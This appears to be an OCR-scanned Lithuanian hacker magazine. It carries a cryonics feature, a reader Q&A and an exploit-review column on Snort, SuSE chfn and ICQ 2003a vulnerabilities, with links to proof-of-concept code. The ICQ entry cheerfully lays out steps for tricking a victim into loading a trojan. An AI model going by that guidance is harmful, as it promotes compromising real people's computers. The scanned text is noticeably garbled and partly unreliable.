tai ženklas iš aukščiau. Ką ten gali žinoti, gal taip ir yra. 
Nokia. Taip vadinosi suomių miestas, kuriame buvo pirmoji 
kompanijos gamykla. O miestas taip vadinosi dėl to, kad bu- 
vo pastatytas šalia to paties pavadinimo upės. Štai taip. 
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Nemirtingumo 


technologija 


PASAK APIBRĖŽIMO, TRANSŽMOGUS — TAI 
ŽMOGUS, KURIS, NORĖDAMAS ATEITYJE 
PAMATYTI KARDINALIAI NAUJAS GALIMY- 
BES, JAU ŠIANDIEN JOMS RUOŠIASI IR TO- 
BULINA SAVE VISAIS ĮMANOMAIS BŪDAIS. 
KARTU SU DIRBTINIU INTELEKTU, KIBOR- 
GIZACIJA IR NANOTECHNOLOGIJOMIS, 
TRANSHUMANIZMAS REMIASI MOKSLINIO 
IMORTALIZMO (MOKYMO APIE NATŪRALIUS 
MOKSLINIUS METODUS PRATĘSTI GYVENI- 
MĄ PRAKTIŠKAI IKI BEGALYBĖS) PASIEKI- 
MAIS. NESIGILINDAMI Į GINČYTINUS FILO- 
SOFINIUS KLAUSIMUS, ŠIANDIEN MES PA- 
ŠNEKĖSIME APIE NEMIRTINGUMO TECH- 
NOLOGIJAS. 


Krionika ir kiti gyvenimo stimuliatoriai 
Daugelio imortalistų įsitikinimu, pats realistiškiausias 
žingsnis link nemirtingumo yra krionika. Pagal visas prog- 
nozes, bet kokių kitų gyvenimo pratęsimo metodų rea- 
lizacija, įskaitant genų inžineriją, molekulinę mediciną 
ir visiškai fantastišką žmogiškosios asmenybės perkėli- 
mą į kompiuterinius kaupiklius, užtruks ne vieną de- 
šimtį metų. Krionika, arba, kitaip tariant, kriostazė — 
tai žmonių konservavimas juos užšaldant iki ultražemų 
kriogeninių temperatūrų, nepretenduoja į „gyvybės 
eliksyro“ vaidmenį. Tai viso labo galimybė paruošti „kie- 
tą“ žmogaus kūno kopiją, tikintis po to ją atgaivinti, pa- 
naudojant ateities medicinines technologijas. Kriosta- 
zės šalininkai neneigia, jog kol kas nėra būdu, kaip už- 
šaldytus pacientus sugrąžinti į gyvenimą. Tačiau akivaiz- 
du, kad atšildymo, atgaivinimo ir ląstelių bei audinių 
„remonto“ technologija molekuliniame lygyje bus nano- 
technologija. Ir nesvarbu, kada ji taps prieinama. Krio- 
nika pasiruošusi laukti savo valandos ir dešimt, ir šim- 
tą, ir tūkstantį metų. Kaip sako kriostazės šalininkai, tai 
yra vienintelis mokslinis metodas, kuris tiesiog dabar 
suteikia žmogui galimybę (tegu ir menką) nemirtingu- 
mui ateityje. 


[Mokslas] Biologiniu atžvilgiu krionikos esmė yra to- 
kia. Tradicinė medicina, kuri nugalėjo klinikinę mirtį, 
praktiškai pasiruošusi pripažinti, jog tam tikrą pakan- 
kamai ilgą laiką po biologinės žmogaus mirties dauge- 


lis jo smegenų lastelių dar lieka gyvos ir išsaugo informaciją 
apie jį kaip asmenybę. Dar mažiausiai keletui valandų žmo- 
gaus individualumą galima užfiksuoti ryšių tarp galvos smege- 
nų neuronų struktūros „nuotraukos“ pavidalu. Ir tik šios infor- 
macijos išnykimas reikš informacinę ir galutinę žmogaus mirtį. 
Tokį teiginį lyg ir pagrindžia faktas, jog net ir sunkios galvos 
traumos nesukelia visiško Žmogaus asmenybės praradimo. Tai 
reiškia, kad bendros smegenų struktūros išsaugojimo net II 
„su kokybės praradimu“ gali visai pakakti tikslios užšaldyto žmo- 
gaus kopijos atkūrimui ateityje. 


[Technologija] 

Technologinis kriobalzamavimo procesas atrodo taip. Kraują pa 
keičia specialus žemoms temperatūroms atsparus pakaitalas, pa- 
vyzdžiui, glicerinas. Audiniai prisodrinami cheminio krioprotekto- 
riaus tirpalo, kuris sumažina audinių pažeidimą užšaldymo metu. 
Po to prasideda lėtas tolygus kūno atšaldymas. Kūnas perveža- 
mas į specialią saugyklą, kur galva žemyn įkišamas į kriostatą 
didelį metalinį skysto azoto pripildytą termosą, kuriame tempera 
tūra yra -196 laipsniai pagal Celsijų. Tokiu pavidalu saugomas 
kūnas nesikeis nepaprastai ilgai. Neiprastą pozą lemia tai, jog azotas 


! 


greitai išgaruoja ir jį reikia nuolat pa- 
pildyti. Net jeigu šiame griežtai api- 
brėžtame technologiniame procese 
įvyktų kokių nors sutrikimų, paciento 
smegenys dar kurį laiką būtų apsau- 
gotos. Iš esmės, vien išsaugotų sme- 
genų visiškai pakanka norint pasiek- 
ti galutinį kriostazės tikslą. Nuo kūno 
atskirtos „profesoriaus Douelio gal- 
vos“ kriobalzamavimas buvo pavadin 
tas „neurokonservacija“. Transplan- 
tologijoje pakankamai seniai prakti- 
kuojamas spermos, kiaušinėlių ląs- 
telių, kaulų smegenų, odos ir akies rainelės užšaldymas. Pirmieji 
nedidelių suaugusio žmogaus smegenų fragmentų užšaldymo eks- 
perimentai parodė, jog po atitirpdymo „pilkoji medžiaga“ sklei- 
džia elektrinį aktyvuma. Iš viso, nedideli biologiniai objektai po 
apdorojimo krioprotektoriais lengvai pakelia užšaldyma. Kai kurių 
vabzdžių ir gyvūnų organizmai gali savarankiškai gaminti natūralius 
krioprotektorius — cukrų ir gliukozę. Šiandien mokslininkai 
sprendžia dideiių organu ir biologinių objektų užšaldymo užduotį. 


Nevienarūšė jų struktūra 
neleidžia kokybiškai apdoroti 
tokių audinių krioprotektoriais ir 
užtikrinti tolygaus užšaldymo. Dėl 
to biologinės struktūros yra 
dalinai suardomos. Tokio organo 
reanimavimas be išankstinio 
„remonto“ lems jo žuvimą. Beje, 
elektrofotonuotrauka parodė, 
kad pažeidimai paprastai būna 
minimalūs ir nėra negrižtami. 
Šiuolaikiniai tyrinėjimai atliekami 
dviem kryptimis: universalių 
sintetinių krioprotektorių kūrimas 
(šiandien jų efektyvumas siekia 
85960) ir užšaldymo metu 
sunaikintos struktūros 
vientisumo atkūrimo algoritmų 
kūrimas. Gamtinis tokio algoritmo analogas yra ribosomos 
„programa“ ribonukleino rūgšties molekulės pavidalu, pagal kurios 
atitikmenį iš aminorūgščių konstruojama baltymo molekulė. 
Ląsteles remontuos ir organus į gwenimą greičiausiai grąžins „Mo 
lekuliniai chirurgai“ nanomanipuliatoriai (mūsų žurnale jau ne 
kartą buvo rašyta apie nanotechnologijas). | užbalzamuotą kūną 
bus paleista milijonai milijardų nanorobotų, Kurių bendras svoris 
bus apie 500 gramų. Su miniatiūriniais skaičiavimo įrenginiais 
jie išanalizuos mirties, kriobalzamavimo ir saugojimo metu sU- 
keltus pažeidimus. Po to užvirs tikrasis darbas. Perkeldami mole- 
kules ir modifikuodami jų struktūrą, nanomanipuliatoriai atstati- 
nės ląstelių membranas, sujungs perplėštas ląstelės apvalkalo 
sritis, perpjaus molekulių viduje ir tarp jų esančias siūlės, šalins 
kenksmingus apsikeitimo produktus Ir koreguos genetinę me- 
džiagą. Toks „kapitalinis remontas“ lems ląstelių gydymą Ir pa- 
sveikimą, t.y. jos atkūrima jaunesniu pavidalu. Taip bus išgydytos 
tos ligos, kurios buvo Žmogaus 
mirties priežastimi, įskaitant vėžį 
ar AIDS. | gyvenimą sugriš ir tie 
pacientai, kurie žuvo dėl nelai 
mingo atsitikimo ar žmogžudys 
tės. Tokia reanimacijos procedū 
ra gali trukti keletą mėnesiu. Po 
to nanorobotai organizma paliks 
taip pat, kaip ir paprasčiausias 
gripo virusas — per šlapimą, 
kraujotakos sistemą arba kvėpa 
vimo takus. 


[Verslas] Šiandien krioninių de- 
pozitoriumų (kriotorijų) paslaugas 
bendrai paėmus teikia penkios 
kompanijos: „Alcor“ Arizonoje, 
Krionikos institutas Detroite, 
„CryoCare Foundation“, Ameri 
kos krionikos bendruomenė ir 
korporacija „TransTime“ Kalifor- 
nijoje. Kriostatų kapsulėse 

po keturis užšaldytus kūnus 
kiekvienoje - skirtingais paskai- 
čiavimais yra nuo 100 iki 200 


Amiasės Devas krinsstaitas, esantis „Alos“ Laboratorijoje 
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„Aicor“ krnotorijaus pastatas Arizonos valstijoje, JAV 


krionikos pionierių. Dar 2000 užšaldymo laukia eilėje. Kasmet šis 
skaičius išauga 200—-300 žmonių. Paprastai tokiu atveju sudaro- 
ma kriostazės sutartis, žmogus tampa organizacijos nariu ir kas- 
met moka nario mokesti. Pačios užšaldymo procedūros kaina swy- 
ruoja nuo 30 iki 150 tūkstančių dolerių. Tokią didelę kainą lemia 
neribotas sutarties terminas ir ištisas priemonių kompleksas, skir- 
tas išvengti pirmalaikio atšildymo, įskaitant rezervines azoto talpas 
ir avarinius dyzelinius generatorius. Paprastai už visą sumą apifor- 
minamas draudimas mirties atveju. Finale jaunam žmogui draudi- 
mo įnašas neviršija 1000 dolerių per metus. Kai klientas bus kri- 
tinės būklės tarp gyvenimo ir mirties, į krioninio depozitorijaus pul- 
tą per giminaičius, gydytojus arba medicininius daviklius bus iš- 
siųstas pranešimas, kuri gavusi į įvykio vietą iš karto išvažiuos spe- 
cialistų brigada. Vos tik gydytojas pasirašys mirties liudijimą, prasi- 
dės kūno paruošimas užšaldymui. Tolimesnę istoriją tu jau Žinai. 
Pagal sutarties sąlygas, kūnas kriostate bus saugomas iki pat tech- 
nologijos, kuri leis ji reanimuoti, atsiradimo ateityje. Siekiant pa- 
dengti kūno aptamavimo išlaidas, dalis mokamos sumos padeda- 
ma į banką už procentus, kas leis kūną saugoti neribotą laiką, 0 po 
kliento „prisikėlimo“ jam įteikti apvalią pinigų sumelę. Beje, krioni- 
koje naudojamas ir vienas įdomus juridinis triukas. Kad atšildytas 
klientas, kuris savo laiku buvo „palaidotas“, galėtu grįžti į pilnavertį 
gwenimą, jam rekomenduojama pinigus pervesti į, pavyzdžiui, Švei- 
carijos banka. Pagal įstatymus niekas be paties tokio indėlio savi- 
ninko negali pareikšti pretenzijų į šiuos pinigus ir nekilnojamąjį tur- 
tą. Teisminiu požiūriu mirties faktas čia neturi esminės įtakos. 


[Atšildymas] Nuo 1967 iki 80-ųjų metų buvo užšaldyta viso 
labo 20 žmonių. 90-ųju pabaigoje Amerikoje, Vakarų Europoje ir 
Australijoje jau buvo apie 20 krioninių bendruomenių. Tačiau prieš 
keletą metu praktiškai visi klientai buvo atšildyti. Pagal vieną ver- 
siją, buvo pažeista saugojimo technologija. Pagal kitą — kriotori- 
jai paprasčiausiai bankrutavo, kadangi pacientų giminaičiai vie- 
nas po kito nutraukė mokėjimus už jų saugojimą. Didelė kūnų 
dalis buvo perduota „Alcor“ korporacijai ir Krionikos institutui. Kai 
kuriuos teko atšildyti ir palaidoti. Po to, kai 2004 metų balandį 
kompanija „CryoSpan“ 10 tokių „Iedinukų“ perkėlė į Detroito krio- 
toriju, pasaulyje liko faktiškai dvi aukščiau paminėtos „gyvenimo 
pratęsimo citadelės“. Beje, neurokrioservisą kol kas praktikuoja 
vien tik korporacija „Alcor“. 


[Rusijos indėlis] Jau dvejus metus Maskvos biomedicinos tech- 
nologijų institutas ir Detroito krionikos institutas prašo atsiliepti 
visus norinčiuosius dalyvauti pirmojoje Rusijoje atliekamoje krio- 
ninėje kompanijoje. Mūsų didžiojoje kaimynėje iš rytų planuoja- 
ma atlikinėti ląstelių apdorojimą krioprotektoriais ir išankstinį at- 
šaldymą iki sauso ledo temperatūros. Po to kūnas bus pervežtas 
saugoti į JAV, į krionikos institutą. Be augančios paslaugos pa- 
klausos, Rusija domimasi dar ir dėl šviežių žmonių lavonų porei- 


kio su santykinai paprastai gaunama licencija medicininiams eks- 
perimentams atlikti. Šiaip jau eksperimentai su kriogeniniu gyvų 
žmonių užšaldymu oficialiai uždrausti. Vis dėlto kompanijos rei- 
kalauja, kad pacientai būtų pervesti į anabiozės būseną dar prieš 
tai, kol liga sukels jų mirtį. Gali būti, kad kai krionikos efektyvu- 
mas bus patvirtintas, šis draudimas bus atšauktas. O kol kas 
kriotorijų santykiai su valdžia nėra paprasti. 2003 metų rugpjūtį 
Detroito krionikos institutas vos nebuvo uždarytas. Kompanijos 
savininkams teko skubiai savo veiklą licencijuoti kaip kapinių ver- 
slą. Dabar vitrifikacijos procedūrą, kūno paruošimą užšaldymui, 
gali atlikti tik kviestiniai koroneriai. Taip pat apmokytos ir kompa- 
nijos, kurios užsiima išskirtinai kūnų transportavimu į kriotorijų. 
Anksčiau buvo svarstomas „kriofermos“, kuri būtu aprūpinta kū- 
nų saugojimui ir skysto azoto gamybai skirta įranga, statybos Pa- 
maskvėje projektas. Prie fermos taip pat buvo planuojama įkurti 
komuną, kurioje savanoriškai dirbtų dar gyvi, bet mirčiai besiruo- 
šiantys žmonės. Tai leistų išvengti kūno pristatymo į kriotoriju iš- 
laidų ir padėtų realiai sumažinti kriostazės procedūros kainą. Skru- 
pulingais Rusijos verslo spaudos paskaičiavimais, ultrašiuolaikiš- 
ko kriotorijaus įkūrimas Rusijoje atsieitų apie 200-300 tūkstan 
čių dolerių, įskaitant galingą informacinį aprūpinimą. 

„Rusų mafija“ visada prastūminėjo krioniką. Pakanka pasakyti, 
jog krionikos tėvas yra fizikos profesorius Robertas Etindžeris, 
romano bestselerio „Nemirtingumo perspektyva“ autorius, dar 
visai neseniai buvęs Detroito krionikos instituto direktoriumi, 
Pagal motinos liniją jis yra išeivis iš Rusijos. Maždaug prieš pu- 
sę amžiaus prieš Etindžerį rusų biofizikas Bachmetjevas pirmą 
kartą eksperimentais įrodė, kad žinduoliai gali pakelti atšaldy- 
mą iki mažesnės už nulį temperatūros pagal Celsijų, ir išsakė 
idėją apie tai, kas vėliau buvo pavadinta krionika. Šiandien Krio- 
nikos instituto mokslų direktorius, kuris pats sukūrė pačius to- 
buliausius krioprotektorius pasaulyje, yra Jurijus Pigučinas, pra- 
eityje buvęs Charkovo instituto kriobiologijos ir kriomedicinos 
padalinio darbuotojas. Jis pagrįstai laikomas žymaus rusų „kos- 
misto“ Nikolajaus Fiodorovo mokiniu. Užsienyje gyvena ir dirba 
1999 metų Gerontologijos bendruomenės premijos už kriobio- 
logijos srities tyrinėjimus laureatas Michailas Solovjovas. Krio- 
nikos idėjas plėtoja garsus Masačūsetso technologijos instituto 
darbuotojas Andrejus Barkovskis ir Maskvos biomedicinos tech- 
nologijų instituto direktorius Igoris Artiuchovas. 

[Pabaiga] Apie pusę prašymų užšaldyti į kriotoriju paskutinę aki 


Detroito kronikos mokslų Instituto direktorius Jurijus Pigučinas 


mirką siunčia artimieji, kurie niekaip negali susitaikyti su savo 
giminaičio netektimi. Taigi krionika — tai, be abejo, pelningas 
verslas, daromas iš mirties. Tačiau tikrieji transhumanizmo filo- 
sofijos vertintojai ir kriostazės šalininkai dažniausiai yra neeili- 
nės asmenybės, kupinos optimizmo ir kūrybinių jėgų, mylinčios 
gyvenimą ir norinčios gyventi kaip įmanoma ilgiau. Plėtojantis 
GNR technologijoms — pagal Bilą Džojų, joms priskiriamos ge- 
nų inžinerija, nanotechnologijos ir robototechnika — transhu- 
manistu kiekis mūsų planetoje augs geometrine progresija. Ar 
tu jiems priklausysi, ar ne — priklausys tik nuo tavo pasaulio 
suvokimo. 


[Pergalė prieš mirtį] 

Sprendžiant iš naujienų, hi-tech'as mirčiai metė iššūkį. Ma- 
žiausiai dvi kompanijos — amerikiečių „LifeGem“ (www.life- 
gem.com) ir šveicarų „Algordanza“ (www.algordanza.ch) — 
siūlo deimantų gamybos iš po žmogaus kremavimo likusių 
pelenų paslaugą. Pirmoji kompanija prideda mineralų, kas 
leidžia gauti skirtingų atspalvių (žydro, raudono, geltono) dei- 
mantus. Antroji tvirtina, kad jos produkcija nėra „genetiškai 
modifikuota“ ir 10096 sudaryta iš pelenų. Pirmos klasės dei- 
manto, kurio svoris nuo 0,2 iki 1 karato, kaina svyruoja nuo 
2,700 iki 20,000 dolerių. Beje, šios technologijos patentas 
vėlgi priklauso mūsų kaimynams iš rytų. 

Vienas vokietis parduoda įrenginį „Telefoninis angelas“ (http:/ 
/www.telefonengel.de/) — radijo ryšį su mirusiaisiais. Bal- 
sas po žeme sklinda iš garsiakalbio. Greičiausiai velionis dar 
būdamas gyvas tiesiog šokinėtų iš laimės dėl to, kad jo uoš- 
vė galės ir po mirties jį užknisinėti telefonu. 

Festivalyje „NextFest 2005“, kuris vyko 2005 metų birželio 
mėnesį, buvo pateikta androidinė amerikiečių rašytojo fan- 
tasto Filipo Diko („Bėgantysis skustuvo ašmenimis“, „Ypa- 
tinga nuomonė“, „Viską prisiminti“ ir t.t.) kopija, nors šis ra- 
šytojas mirė dar 1982 metais. Philip K. Dick (http://hanson- 
robotics.com/project pkd.php) robotas ne šiaip sau pana- 
šus į Diką ir realistiškai sintezuoja jo balsą. Panaudodamas 
kūrinių ir memuarų tekstus, jis išstudijavo rašytojo nuomonę 
daugeliu šiuolaikinių klausimų ir atsikerta originaliomis re- 
plikomis. O internete adresu http://triumphpc.com/johnlen- 
non/ galima rasti Džono Lenono dirbtinio intelekto projektą. 


Nuotraukos iš išslaptintų „TransTime“ ir „Alcor“ archyvų 


Girdėjau apie tai, kad Google suteikia nemoka- 
mą VPN servisą. Nejaugi tai tiesa? 


Atsiradus servisui maps.g00gle.com (su juo gali- 

ma iš palydovo pamatyti bet kuri Žemės tašką), 

mažai kas stebina. Kodėl gi masėms nesuteikus 

laisvo priėjimo prie virtualaus privataus tinklo? Ži- 
noma paieškos sistema iš tiesų suteikia VPN servisą, 
ir savaime suprantama, tai daroma visiškai už dyką. 
Tiksliau šnekant — suteikinėjo, kadangi šios apžval- 
gos rašymo metu aptariamas resursas buvo visiškai 
nepasiekiamas. Keletas valandų bandymų, mėginant 
gauti išganingąjį priėjimą, baigėsi nesėkmingai, tačiau 
gali būti, jog tau pavyks labiau. Tiesiog užeik i svetainę 
https://vpn.google.com/getpass/ ir nurodyk vartotojo var- 
dą bei slaptažodį. Numatau tavo klausimą dėl serverio 
anonimiškumo. Jokio privatumo! Serveris yra viešas, 
todėl adminai greičiausiai registruoja logus. Beje, tin- 
klo srautas šifruojamas pagal visas taisykles, todėl Go- 
ogle VPN galima drąsiai naudoti savo tinklo srauto mas- 
kuotei. 


O: Kokias šiais laikais pelytes naudoja profesio- 
nalūs žaidėjai? Noriu draugui padovanoti iš tiesų 
kietą įrenginį, tačiau esu šiek tiek atsilikęs nuo 
šiuolaikinių tendencijų. 


A: Aš seniai supratau, kad tokiems, atrodytų, nie- 
kams, kaip klaviatūra ir pelė, nėra taupoma. Pas 


mane iki šiol veikia prieš keletą metų nupirkta 
brangi klaviatūra Cherry ir megakietas „graužikas“ Lo- 
gitech MX300. Ir žinai, aš tikrai nesiruošiu jų keisti. 
Tiesa, man tai labai norėjosi padaryti po to, kai aš 
perskaičiau Logitech MX-510/518 (—45$, 800 dpi), 
Microsoft IntelliMouse Explorer 4.0a (—20-25$, 400 
dpi) ir Razer Diamondback Precision (—-65$, 1600 dpi) 
apžvalgas. Realiu hardkoru galima pavadinti lazerinę 
pelę Logitech G5 (2000 dpi), tiesa, jos kaina kol kas 
kosminė (—100$), tačiau realaus profo tai niekada 
nesustabdys. 


Kas tai yra honeymonkeys? Ar jie kaip nors susiję su 
web trojanais? 


Ne tik meškinai mėgsta medų, bet ir packet monkeys, 
(1) tai yra script kiddies. Šie „hakeriai“ godūs lengvų taiki- 
nių: pavyzdžiui, neužlopytų Windows XP kompiuteriu. Ši 
koncepcija tapo logišku honeypots technologijos tęsi 
niu, t.y. serverių sistemų, kurios yra išmėtytos visame inter- 
nete ir kurios vilioja piktavalius, o dažniausiai -— jų kūrinius, 
tinklo kirminus. 
Dėl web trojanų 
stengsiu atsakyti. 
Kompanija „Microsoft Cybersecurity and Systems Manage- 
ment Research Group“ („medaus beždžionių“ koncepcijos 
autoriai) sukūrė didelį tinklą iš skylėtų kompiuterių, kurie 
naršo internetą, peršokdami iš vienos svetainės į kitą, ku- 
riose galėtų tūnoti užkrėsti puslapiai. Užkratai nusėda spe- 
cialistų kompiuteriuose, kur jie bus toliau studijuojami ir 
detaliai analizuojamas jų darbas. Ypatingai aktyviai MS mi- 
na ant spamerių kulnų, kurie po jų išaiškinimo yra kviečia- 
mi į teismo salę. Šiai aferai kontora išskyrė daugiau $5M. 
Šiame sukurtame beždžionių tinkle yra skirtingo saugumo 
(atnaujinimo) lygio kompiuteriai, siekiant tiksliai išsiaiškinti 
interneto banditų apetitą ir taikymąsi į konkrečius pažei- 
džiamumus. Jeigu nori išsamesnio honey koncepcijos ap- 
rašymo, rekomenduočiau apsilankyti adresu www.honey- 
net.org. Taip pat derėtų paminėti, kad MS visame šiame 
medaus puodyniu reikale buvo toli gražu ne pirma. 


kitas klausimas, į kuri aš taip pat pasi- 


BŪK KONKRETUS IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ | 
HACK-FAG, STENKIS JĄ KUO IŠSA- 
MIAU APRAŠYTI. TIK TUOMET AŠ 
GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI PARODYTI GALIMAS 
KLAIDAS. VENK BENDRINIŲ KLAU- 
SIMŲ, PANAŠIŲ | „KAIP NULAUŽTI 
INTERNETĄ?“ — TU TIK APKRAUSI 
SAVO IR MANO PAŠTO DĖŽUTES. IŠ 
MANĘS GREĘŽTI KO NORS UŽ DYKĄ 
(INTERNETO, SHELLŲ IR PANAŠIAI) 
NEVERTA, NES AŠ PATS GYVENU Iš 
HUMANITARINĖS PAGALBOS! 


Kai kurios tamsiosios asmenybės taip giliai pasineria | 
laužimus, kad net sėkmingai nuverčia nepajudinamus 
saugumo postulatus. Visai nesenai SANS institutas su- 
krėtė Oracle gerbėjų smegenis, kuomet atskleidė šiai 
duomenu bazei skirtų slaptažodžių generavimo mechaniz- 
mą. Tyrimų metu buvo išaiškinta daugybė silpnų vietų, ku 
rios leidžia pakankamai greitai atskleisti vartotojo slaptažo- 
di. Pavyzdžiui, visiškai nesunku įsitikinti, kad slaptažodžio 
„antspaudas“ iš tiesų yra sukuriamas iš eilutės userna 
me.password, t.y. sujungto vartotojo prisijungimo vardo ir jo 
slaptažodžio. Taip pat lengvai galima patikrinti, kad autenti 
fikacijos sistema yra nejautri didžiosioms/mažosioms rai 
dėms, nes slaptažodžių Apple ir appLE hešas bus vienodas. 
SANS specialistai taip pat aptiko dar keleta paties algorit- 
mo silpnybių, apie ką išsamiai parašė organizacijos svetai- 
nėje pateiktame dokumente. 
Sans.org ne vaikučių gauja, todėl veikė visiškai korek- 
tiškai: kūrėjams davė keletą dienų problemoms pašalinti. 
Pataisymų likimas kol kas neaiškus, taip pat neprieinami 
ir Oracle inžinierių komentarai. Slaptažodžių tvirtumo pro- 
blema yra avangarde, o šviežias skandalas dėl mokyklos 
duomenų bazės nulaužimo Kalifornijoje akivaizdus to 
pavyzdys. Žodžiu, pirštų antspaudai kaip identifikacijos prie- 
monė — dienos darbotvarkėje. 


Ar galima pasitikėti Oracle slaptažodžių saugojimo 
sistema? 


EKSPLOITŲ AP/VALGA 


SNORT <= 2.4.2 BACKORIFICE REMO- 
TE BUFFER OVERFLOW EXPLOIT 


[aprašymas] Jeigu tu pameni, tai ne- 
seniai spausdintoje eksploitų apžvalgo- 
je aš aprašinėjau žymiosios /DS Snort 
pažeidžiamumą. Jeigu prieš tai aptartoje 
klaidoje Snort kentėjo nuo perpildymo 
įjungtame derinimo režime, tai dabarti- 
nė klaida pasireiškia bet kokiame pa- 
leidimo režime. Perpildymo klaida įvyksta 
apdorojant taip vadinamus Back Orifi- 
ce paketus. Piktavalis gali suformuoti 
suklastotą paketą su nekorektišku ilgio 
lauku, dėl Ko įmanoma įvykdyti laisvai 
pasirinktą kodą. Klaidų ieškotojai para- 
šė veikiantį eksploitą, kuris pribindina 
shellą prie 31337 pažeidžiamos siste- 
mos jungties. 

Eksploite pateikiami du paskirties tiks- 
lai (targets) su skirtingais testavimo re- 
žimais. Pakanka pasirinkti vieną iš jų 
(paprastai pasirenkamas pirmasis), vie- 
toje parametrų nurodžius IP adresą ir 
tikslo numerį. Jeigu viskas padaryta tei- 
singai, pažeidžiamoje sistemoje bus ati- 
daryta 31337 jungtis su /bin/bash in- 
terpretatoriumi. 


[apsauga] Oficialioje Snort svetainėje pa- 
teikta paskutinė IDS versija — Snort- 
2.4.3. Šiame leidime aprašyta klaida vi- 
siškai ištaisyta. 


[nuorodos] Veikiantis eksploitas pateik- 
tas adresu www.securitylab.ru/poc/extra/ 
241424.php. Techninių klaidos niuansų 
aprašymą galima rasti eksploito išeities 
tekste arba šiame puslapyje: www.secu- 
ritylab.ru/vulnerability/source/ 
241240.php. 


[blogio įvertinimas ir potencialas] Per 
šiuos metus tai jau antrasis smūgis Snor- 
t'ui. Įvertinus tai, kad šis produktas yra 
įsilaužimų/atakų atpažinimo sistema, kū- 
rėjų reputacija smarkiai suprastėjo. Da- 
bar piktavaliai turi net dvi skyles į „labiau- 
siai apsaugotos sistemos centrą“. 


[sveikinimai] Pažeidžiamumą aptiko žy- 
mi komanda Internet Security Systems. Iš- 
publikavus duomenis apie klaidą, popu- 
liari komanda THC (www.thc.org) parašė 
daugiafunkcinį eksploitą. 


SUSE LINUX PWDUTILS “CHFN" UTILITY 
LOCAL PRIVILEGE ESCALATION EXPLOIT 


[aprašymas] Operacinė sistema SuSE 
Linux visada garsėjo savo stabilumu ir 
saugumu. Bent jau todėl, kad tai ko- 
mercinė OS. Tačiau ne taip senai hake- 
riai SuSE sistemoje aptiko pavojingą 
saugumo skylę. Klaida tyko pwdutils pa- 
kete, programoje chfn. Ši programa pa- 
gal nutylėjimą turi nustatytą suid bitą, o 
jos paskirtis — pakeisti informaciją apie 
vartotoją. Šios bylos išeities tekstuose 
buvo surastas buferio perpildymas, ku- 
ris veda link štai ko: bet koks vartotojas 
gali papildyti bylą /etc/shadow informa- 
cija apie savo suklastotą sisteminį var- 
totoją, 0 po to jam perduoti suid'ą. Bū- 
tent tai ir padaro gudrusis eksploitas. 
Visų pirma atliekamas gudrus /etc/sha- 
dow papildymas, o po to paleidžiamas 
/bin/su. Galiausiai hakeris gauna patį 
žemiausią UID'ą :). 


[apsauga] Sistemos kūrėjai iš karto su- 
reagavo į šį pažeidžiamumą ir išleido pa- 
taisymus kiekvienai pažeidžiamai SuSE ver- 
sijai. Peržiūrėti įspūdingą pataisymų kiekį 
galima adresu Attp://lists.suse.com/archi- 
ve/suse-security-announce/2005-Nov/ 
0002.html. 


[nuorodos] Eksploitą, parašytą su bash 
komandomis, galima pasiimti iš puslapio 
www.securitylab.ru/poc/extra/ 
241883.php. Kol kas neatskleidžiama 
klaidos istorija ir techninės detalės. 


[blogio įvertinimas ir potencialas] Su- 
SE Linux yra labai populiari operacinė sis- 
tema tiek tarp Linuksoidų, tiek tarp No- 
vel! vartotojų :). Būtent todėl drįstu teigti, 
kad lokaliai sukeltų teisių atvejų daugės 
kasdien. Visus šią apžvalgą skaitančius Su- 
SE adminus aš kviečiu įdiegti išganingąjį 
pataisymą. 


[sveikinimai] Šį kartą išsiskyrė klaidų ieš- 
kotojas Hunger (susechfn(Ohunger.hu). 
Ko gero, tai pirmas jo tokio lygio eksploi- 
tas, todėl draugiškai padėkokime šiam 
„alkanam“ hakeriui. 


ICG 2003A SHELLCODED EXPLOIT 


[aprašymas] Ne taip senai hakeriams 
labai populiarioje programoje /CO 2003a 
pavyko aptikti ganėtinai originalią klaidą. 
Tai paprastas buferio perpildymas klien- 
te, kuris niekaip nesusijęs su ICO proto- 
kolu. Viskas, ką daro eksploitas — su- 
generuoja dvi reikšmes (First ir Last Na- 
me). Pakišus šiuos duomenis į naujų var- 
totojų paieškos lauką, užkraunama ir pa- 
leidžiama vietoje eksploito parametro 
nurodyta byla. Kitaip tariant, norint už- 
krėsti lamerį trojanu, hakeriui tereikia at- 
likti šiuos veiksmus: 

1. Į nutolusį serverį perkelti trojaną, 0 po 
to paleisti eksploitą su parametru- 
nuoroda į kenksmingą bylą. 

2. Surasti atlėpausį lamerį ir prikabinti 
jam ant ausų makaronų apie naują ICO 
savybę, po to neįkyriai paprašyti jo užpil- 
dyti du „vartotojų paieškos“ laukus. 

3. Prisijungti prie aukos kompiuterio ir mė- 
gautis :). 


[apsauga] Pažeidžiamumas pastebėtas 
ICO 2003a ir ankstesnėse klientų versi- 
jose. Vėlesniuose leidimuose klaidos ne- 
bėra. Pažeidžiamiems klientams nėra iš- 
leista jokių pataisymų. 


[nuorodos] Eksploitas yra puslapyje 
www.securitylab.ru/poc/extra/ 
241544.php. Taip pat yra tingiems 
žmonėms skirtas sukompiliuotas va- 
riantas: Attp://mydoom-v.jino-net.ru/ 
icą bof.exe. 


[blogio įvertinimas ir potencialas] 
Norint eksploatuoti auką, reikia turėti 
socialinės inžinerijos įgūdžių. Šiais lai- 
kais pakankamai sunku surasti lamerį, 
kuris mielai įvestų neaiškius duomenis 
į kažkokią dar neaiškesnę formą. Ta- 
čiau tokių, kurie moka įtikinėti kitus, 
dar yra. Jeigu tave galima priskirti prie 
tokių asmenybių — šis eksploitas kaip 
tik tau :). 


[sveikinimai] Klaidos idėja ir eksploitas 
priklauso hakeriui ATmaCA (www.atmaca- 
soft.com). 
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FakeAP: www.blackalche 
my.ta project Take) 
AirJack: http://802.11ni0 
ja. net'airjack 

HostAP: hip /hostap.epi 
test. fi 


Derėtų suprasti, jog visi šia 
me straipsnyje aprašvt 
veiksmai pateikiami Išskir 
tinai tyrinėjimo tikslais ir yra 
skirti tam, kad ieisių išvengti 
galimų su belaidžių tinklų 
funkcionavimi susijusių pro 
biemų. Laikykis savo šalios 


Orinis atmetimas 


PRASTA 802.11 STANDARTO PROTOKOLŲ 
APSAUGA IR DAUGYBĖ DILETANTŲ SISTE- 
MŲ ADMINISTRATORIŲ, NAUDOJANČIŲ ŠĮ 
STANDARTĄ, ĮSISKVERBIMĄ Į BELAIDĮ TIN- 
